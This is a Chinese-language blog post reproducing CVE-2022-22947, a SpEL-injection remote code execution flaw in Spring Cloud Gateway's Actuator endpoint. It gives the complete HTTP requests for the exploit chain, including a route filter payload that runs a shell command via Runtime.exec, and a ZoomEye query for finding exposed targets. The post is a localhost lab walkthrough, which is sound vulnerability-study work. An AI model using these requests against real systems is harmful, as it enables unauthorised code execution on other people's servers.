首页 > 其他分享 >springcloudgatewayRCE(spEl表达式)

springcloudgatewayRCE(spEl表达式)

时间:2024-03-29 23:55:56浏览次数:35  
标签:zh Accept Fetch spEl Sec 表达式 springcloudgatewayRCE gateway 路由

CVE-2022-22947

Spring Cloud Gateway
Remote Code Execute 漏洞
/ SpEL Code Injection 漏洞

基本介绍

cloud全家桶

image.png

image.png

网关作用

l 智能路由 l 负载均衡 l 协议转换 l 权限校验 l 限流熔断 l 黑白名单 l API监控 l 日志审计

Spring Clout Gateway使用

<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-starter-gateway</artifactId>
</dependency>

Spring Cloud Gateway概念

l 路由(Route)
l 断言(Predicate)
l 过滤器(Filter)

原理分析

为了更加方便地给装配赋值,而出的漏洞

Spel概述

Spring表达式语言全称为“Spring Expression Language”,缩写为“SpEL”,类似于Struts2x中使用的OGNL表达式语言,能在运行时构建复杂表达式、存取对象图属性、对象方法调用等等,并且能与Spring功能完美整合,如能用来配置Bean定义。

从Spring 3开始引入了Spring表达式语言,它能够以一种强大而简洁的方式将值装配到Bean属性和构造器参数中,在这个过程中所使用的表达式会在运行时计算得到值。使用SpEL你可以实现超乎想象的装配效果,这是其他装配技术很难做到的

为什么添加过滤器(路由)会造成代码执行

利用流程:

  1. 开启Acutator(监听),可以用该接口列出路由(过滤器),如:/actustor/gateway/routes
  2. 可以通过/gateway/routes/{id_route_to_create}创建路由
  3. 通过/actuator/gateway/refresh刷新路由
  4. 当路由器带有恶意的Filter,里面的spEL表达式会被执行

payload分析

image.png

T:占位符

Actuator操作Gateway接口列表

http://host:port/actuator/gateway/id

id HTTP Method 描述
globalfilters GET 返回全局Filter列表
routefilters GET 每个路由的filter
routes GET 路由列表
routes/ GET 指定路由的信息
routes/ POST 创建路由
refresh POST 刷新路由缓存
routes/ DELETE 删除路由

漏洞复现

启动网关服务

image.png

方式一:bp抓包放包

post请求添加过滤器规则

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "wuyaaq",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

image.png

刷新规则

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:9000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Content-Length: 3
Content-Type: application/x-www-form-urlencoded
Origin: null
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0

a=1

image.png

get访问恶意规则id

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1


image.png

清除数据包,删除所添加的路由

DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Length: 2


image.png

再次刷新路由

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:9000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Content-Length: 3
Content-Type: application/x-www-form-urlencoded
Origin: null
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0

a=1

image.png

方式二:启动自动化脚本

image.png

扫描发现

影响范围

Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
[https://tanzu.vmware.com/security/cve-2022- 22947](https://tanzu.vmware.com/security/cve-2022- 22947)
Pivotal

扫描资产

zoomeye

app="vmware-SpringBoot-framework"

image.png

脚本扫描scan.py

image.png

标签:zh,Accept,Fetch,spEl,Sec,表达式,springcloudgatewayRCE,gateway,路由
From: https://www.cnblogs.com/qgg4588/p/18104875

相关文章

  • Lambda表达式
    函数式接口的定义:任何接口,如果只包含唯一一个抽象方法,那么它就是一个函数式接口。对于函数式接口,我们可以通过Lambda表达式来创建该接口的对象。注意1.Lambda表达式只有一行代码的情况下才能简化成一行,如果有多行就需要用代码块包裹。2.使用Lambda前提,接口必须是函数式接口3.......
  • SPEL表达式注入分析
    环境依赖<dependencies><dependency><groupId>org.springframework</groupId><artifactId>spring-expression</artifactId><version>5.1.9.RELEASE</version></dependency></d......
  • JavaScript快速入门笔记之七(String:字符串类型、RegExp:正则表达式)
    JavaScript快速入门笔记之七(String:字符串类型、RegExp:正则表达式)String:字符串类型什么是字符串?底层本质:一串字符组成的只读字符数组包装类型:临时封装原始类型数据,并提供对数据操作方法的对象——类型名和原始类型名相同!StringNumberBoolean何时使用:不必手动创建!......
  • C语言运算符和表达式——增1和减1运算符
    目录增1和减1运算符一元运算符前缀增1/减1运算符后缀增1/减1运算符前缀与后缀对变量和表达式的影响稍微复杂一点的例子增1和减1运算符的优缺点增1和减1运算符增1运算符(Increment)++*使变量的值增加1个单位减1运算符(Decrement)--*使变量的值减少1个单位注意:操作数......
  • notepad++ 利用正则表达式批量删除关键词所在行
    摘要平时使用notepad++查看文本文档,或者打开日志文件,总有一些不太关心的信息需要去除,基于这种情况,notepad++支持正则表达式,便有了操作空间。正则表达式查找使用正则表达式#匹配指定关键字所在的整行^.*关键字.*\r?\n示例:匹配包含"info"的行^.*info.*\r?\n具体步骤使用......
  • Java实现的表达式求值算法(包括加减乘除以及括号运算)
    packagecom.example.demo.java;importcom.greenpineyu.fel.FelEngine;importcom.greenpineyu.fel.FelEngineImpl;importjava.math.BigDecimal;importjava.util.HashMap;importjava.util.Map;importjava.util.Stack;importjava.util.regex.Matcher;impor......
  • OGNL表达式注入分析
    OGNL基础依赖<dependency> <groupId>ognl</groupId> <artifactId>ognl</artifactId> <version>3.1.19</version></dependency>OGNL三要素Expression表达式root根对象、即操作对象context上下文,用于保存对象运行的属性及值,有点类似运行环境的意思,保存了环境变量看个......
  • JAVA8-Lambda表达式
    Lambda表达式是Java8中引入的一项特性,它提供了一种简洁的方法来表示只有一个方法的接口(即函数式接口)的实例。Lambda表达式通常用于创建匿名方法。这种表达式是函数式编程的核心,允许开发者写出更简洁、更灵活的代码。Lambda表达式的结构Lambda表达式的一般形式是(参数列......
  • 正则表达式的贪婪模式与非贪婪模式
    正则表达式中的贪婪模式和非贪婪模式(也称为勉强模式或懒惰模式)是量词行为的两种不同模式。这些模式影响正则表达式如何匹配字符串中的字符序列。贪婪模式(Greedy)贪婪模式是正则表达式的默认行为。在贪婪模式下,正则表达式会尽可能多地匹配字符。它会尝试匹配尽可能长的字符串片......
  • 16使用正则表达式处理字符串
    1<!DOCTYPEhtml>2<htmllang="en">3<head>4<metacharset="UTF-8">5<metaname="viewport"content="width=device-width,initial-scale=1.0">6<title>Document......